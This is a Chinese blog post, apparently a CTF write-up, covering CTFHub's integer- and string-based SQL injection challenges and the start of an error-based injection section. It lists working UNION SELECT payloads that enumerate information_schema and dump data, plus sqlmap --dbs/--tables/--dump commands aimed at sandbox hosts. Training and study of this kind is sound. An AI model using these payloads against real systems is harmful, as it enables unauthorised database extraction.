<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.0.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha256-CTSx/A06dm1B063156EVh15m6Y67pAjZZaQc89LLSrU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.18.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"defalut"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="整数型注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入（1）">
<meta property="og:url" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/index.html">
<meta property="og:site_name" content="Crrrln">
<meta property="og:description" content="整数型注入">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0%E6%B3%A8%E5%85%A5%E8%BE%93%E5%85%A51.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0%E6%B3%A8%E5%85%A5-%E6%A3%80%E6%9F%A5%E6%9C%89%E5%87%A0%E8%A1%8C.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%9F%A5%E7%9C%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0%E6%B3%A8%E5%85%A5%E6%9F%A5%E7%9C%8B%E8%A1%A8%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E8%AF%81%E4%B9%A6%E6%B3%A8%E5%85%A5%E6%9F%A5%E7%9C%8B%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%9F%A5%E7%9C%8Bflag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0-sqlmap-%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0-sqlmap-dba.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0-sqlmap-dbs.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0-sqlmap-current.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0-sqlmap-tables.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0-sqlmap-columns.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0-sqlmap-flag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-1.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E6%9F%A5%E7%9C%8B%E6%9C%89%E5%87%A0%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E5%BA%93%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E6%9F%A5%E7%9C%8B%E8%A1%A8%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E6%9F%A5%E7%9C%8B%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-flag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-sqlmap-%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-sqlmap-dba.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-sqlmap-dbs.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-sqlmap-tables.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-sqlmap-columns.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-sqlmap-flag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-1.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E5%87%A0%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E8%A1%A8.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-flag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-2-%E8%A1%A8.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-2-%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-2-flag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-sqlmap-%E7%B1%BB%E5%9E%8B.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-sqlmap-dbs.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E5%AD%97%E7%AC%A6-sqlmap-tables.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-sqlmap-tables.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%8A%A5%E9%94%99-sqlmap-flag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84--%E6%89%8B%E5%B7%A5-1.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E5%87%A0%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E5%BA%93%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E8%A1%A8%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E5%88%97%E5%90%8D.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-flag.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-sqlmap-%E7%B1%BB%E5%9E%8B.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-sqlmap-dbs.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-sqlmap-%E8%A1%A8.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-sqlmap-%E5%88%97.png">
<meta property="og:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E7%BB%93%E6%9E%84-sqlmap-flag.png">
<meta property="article:published_time" content="2024-01-15T16:00:00.000Z">
<meta property="article:modified_time" content="2024-01-28T12:34:17.002Z">
<meta property="article:author" content="Crrrln">
<meta property="article:tag" content="web">
<meta property="article:tag" content="sql注入">
<meta property="article:tag" content="整数型注入">
<meta property="article:tag" content="字符型注入">
<meta property="article:tag" content="报错注入">
<meta property="article:tag" content="Mysql结构">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/%E6%95%B4%E6%95%B0%E6%B3%A8%E5%85%A5%E8%BE%93%E5%85%A51.png">


<link rel="canonical" href="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/","path":"2024/01/16/CTFHUB-WEB-sql注入（1）/","title":"SQL注入（1）"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>SQL注入（1） | Crrrln</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Crrrln</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B4%E6%95%B0%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">整数型注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">1.1.</span> <span class="nav-text">0x01 前置知识</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02-wp"><span class="nav-number">1.2.</span> <span class="nav-text">0x02 wp</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">字符型注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-wp"><span class="nav-number">2.1.</span> <span class="nav-text">0x01 wp</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">3.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86-1"><span class="nav-number">3.1.</span> <span class="nav-text">0x01 前置知识</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02-wp-1"><span class="nav-number">3.2.</span> <span class="nav-text">0x02 wp</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Mysql%E7%BB%93%E6%9E%84"><span class="nav-number">4.</span> <span class="nav-text">Mysql结构</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-wp-1"><span class="nav-number">4.1.</span> <span class="nav-text">0x01 wp</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83%EF%BC%9A"><span class="nav-number">5.</span> <span class="nav-text">参考：</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Crrrln</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">24</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Crrrln">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Crrrln">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="SQL注入（1） | Crrrln">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入（1）
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-01-16 00:00:00" itemprop="dateCreated datePublished" datetime="2024-01-16T00:00:00+08:00">2024-01-16</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-01-28 20:34:17" itemprop="dateModified" datetime="2024-01-28T20:34:17+08:00">2024-01-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/ctfhub/" itemprop="url" rel="index"><span itemprop="name">ctfhub</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>4.8k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>8 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h3 id="整数型注入"><a href="#整数型注入" class="headerlink" title="整数型注入"></a>整数型注入</h3><h4 id="0x01-前置知识"><a href="#0x01-前置知识" class="headerlink" title="0x01 前置知识"></a>0x01 前置知识</h4><ul>
<li>sqlmap支持哪些SQL 注入模式<ul>
<li>六种 SQL 注入技术：基于布尔的盲注、基于时间的盲注、基于错误的注入、基于 UNION 查询的注入（手工）、堆叠查询和带外注入（以DNS协议带外出来）</li>
</ul>
</li>
</ul>
<h4 id="0x02-wp"><a href="#0x02-wp" class="headerlink" title="0x02 wp"></a>0x02 wp</h4><p><strong>方法一：手工</strong></p>
<p>题目写的很清楚，SQL整数型注入，输入1</p>
<p><img src="%E6%95%B4%E6%95%B0%E6%B3%A8%E5%85%A5%E8%BE%93%E5%85%A51.png"></p>
<p>发现直接显示了sql语句</p>
<p>查看有几列数据，输入order by 1，order by 2，order by 3依次尝试，在order by 3的时候没有回显了，则判断共有两列</p>
<p><img src="%E6%95%B4%E6%95%B0%E6%B3%A8%E5%85%A5-%E6%A3%80%E6%9F%A5%E6%9C%89%E5%87%A0%E8%A1%8C.png"></p>
<p>接下来就是三部曲，爆库名、爆表名、爆列名</p>
<p>查看数据库名<code>-1  union select database(), 2#</code></p>
<p><img src="%E6%9F%A5%E7%9C%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png"></p>
<p>sqli即为数据库名</p>
<p>查看表名<code>-1 union select group_concat(table_name), 1 from information_schema.tables where table_schema=&#39;sqli&#39;</code></p>
<p><img src="%E6%95%B4%E6%95%B0%E6%B3%A8%E5%85%A5%E6%9F%A5%E7%9C%8B%E8%A1%A8%E5%90%8D.png"></p>
<p>flag即为表名</p>
<p>查看列名<code>-1 union select group_concat(column_name), 1 from information_schema.columns where table_name=&#39;flag&#39;</code></p>
<p><img src="%E8%AF%81%E4%B9%A6%E6%B3%A8%E5%85%A5%E6%9F%A5%E7%9C%8B%E5%88%97.png"></p>
<p>flag即为列名</p>
<p>查看数据<code>-1 union select 1, flag from sqli.flag</code></p>
<p><img src="%E6%9F%A5%E7%9C%8Bflag.png"></p>
<p>得到flag</p>
<p><strong>方法二：sqlmap</strong></p>
<p>判断数据库类型<code>sqlmap -u http://challenge-11c9544e2023eb65.sandbox.ctfhub.com:10800/?id=1</code></p>
<p><img src="%E6%95%B4%E6%95%B0-sqlmap-%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B.png"></p>
<p>得到数据库的类型是MySQL</p>
<p>判断当前数据库用户权限</p>
<p><img src="%E6%95%B4%E6%95%B0-sqlmap-dba.png"></p>
<p>发现是管理员</p>
<p>查看数据库名<code>sqlmap -u http://challenge-11c9544e2023eb65.sandbox.ctfhub.com:10800/?id=1 --dbs</code></p>
<p><img src="%E6%95%B4%E6%95%B0-sqlmap-dbs.png"></p>
<p>查看当前数据库<code>sqlmap -u http://challenge-11c9544e2023eb65.sandbox.ctfhub.com:10800/?id=1 --current-dbs</code></p>
<p><img src="%E6%95%B4%E6%95%B0-sqlmap-current.png"></p>
<p>查看sqli数据库的表名<code>sqlmap -u http://challenge-11c9544e2023eb65.sandbox.ctfhub.com:10800/?id=1 --tables -D sqli</code></p>
<p><img src="%E6%95%B4%E6%95%B0-sqlmap-tables.png"></p>
<p>查看flag表中的列名<code>sqlmap -u http://challenge-11c9544e2023eb65.sandbox.ctfhub.com:10800/?id=1 --columns -T flag -D sqli</code></p>
<p><img src="%E6%95%B4%E6%95%B0-sqlmap-columns.png"></p>
<p>查看flag数值<code>sqlmap -u http://challenge-11c9544e2023eb65.sandbox.ctfhub.com:10800/?id=1 --dump -C flag -T flag -D sqli</code></p>
<p><img src="%E6%95%B4%E6%95%B0-sqlmap-flag.png"></p>
<h3 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h3><h4 id="0x01-wp"><a href="#0x01-wp" class="headerlink" title="0x01 wp"></a>0x01 wp</h4><p><strong>方法一：手工</strong></p>
<p>输入1，查看sql语句</p>
<p><img src="%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-1.png"></p>
<p>发现了sql语句，和整数型注入的操作一样，查看有几列，发现测试到3的时候没有回显，语句为<code>1&#39; order by 3 #</code>，则表明有两列</p>
<p><img src="%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E6%9F%A5%E7%9C%8B%E6%9C%89%E5%87%A0%E5%88%97.png"></p>
<p>接下来就是爆库名、爆表名、爆列名</p>
<p>查看数据库名<code>-1&#39; union select database(), 2#</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E5%BA%93%E5%90%8D.png"></p>
<p>查看表名<code>1&#39; union select group_concat(table_name), 1 from information_schema.tables where table_schema=&#39;sqli&#39; #</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E6%9F%A5%E7%9C%8B%E8%A1%A8%E5%90%8D.png"></p>
<p>查看列名<code>-1&#39; union select group_concat(column_name), 1 from information_schema.columns where table_name=&#39;flag&#39; #</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-%E6%9F%A5%E7%9C%8B%E5%88%97.png"></p>
<p>查看具体数据<code>1&#39; union select 1, flag from sqli.flag #</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-%E6%89%8B%E5%B7%A5-flag.png"></p>
<p><strong>方法二：sqlmap</strong></p>
<p>和整数型注入的操作相同</p>
<p>判断数据库类型<code>sqlmap -u http://challenge-63aa1b3442b08309.sandbox.ctfhub.com:10800?id=1</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-sqlmap-%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B.png"></p>
<p>查看是不是管理员<code>sqlmap -u http://challenge-63aa1b3442b08309.sandbox.ctfhub.com:10800?id=1 --is-dba</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-sqlmap-dba.png"></p>
<p>查看数据库<code>sqlmap -u http://challenge-63aa1b3442b08309.sandbox.ctfhub.com:10800/?id=1 --dbs</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-sqlmap-dbs.png"></p>
<p>查看表名<code>sqlmap -u http://challenge-63aa1b3442b08309.sandbox.ctfhub.com:10800?id=1 --tables -D sqli</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-sqlmap-tables.png"></p>
<p>查看列名<code>sqlmap -u http://challenge-63aa1b3442b08309.sandbox.ctfhub.com:10800?id=1 --columns -T flag -D sqli</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-sqlmap-columns.png"></p>
<p>查看flag<code>sqlmap -u http://challenge-63aa1b3442b08309.sandbox.ctfhub.com:10800?id=1 --dump -C flag -T flag -D sqli</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-sqlmap-flag.png"></p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><h4 id="0x01-前置知识-1"><a href="#0x01-前置知识-1" class="headerlink" title="0x01 前置知识"></a>0x01 前置知识</h4><p>SQL报错注入： 使用SQL语句报错的语法，用于注入结果无回回显但错误信息有输出的情况，很多函数会导致MySQL报错并显示出数据</p>
<ul>
<li>floor函数<ul>
<li>返回小于等该值的最大整数。floor(rand(0)*2)报错是有条件的，记录必须3条以上</li>
</ul>
</li>
<li>extractvalue函数<ul>
<li>使用xpath的语法从xml字符串中获取数据,使用concat函数将想要获得的数据库内容拼接到第二个参数中，报错时作为内容输出</li>
</ul>
</li>
<li>updatexml函数<ul>
<li>返回被替换的xml片段，updatexml中存在特殊字符、字母时，会出现报错，报错信息为特殊字符、字母及之后的内容，而hex出的数据包含字母和数字，所以第一个字母前面的内容都会丢失，常与concat组合使用</li>
</ul>
</li>
<li>exp函数</li>
</ul>
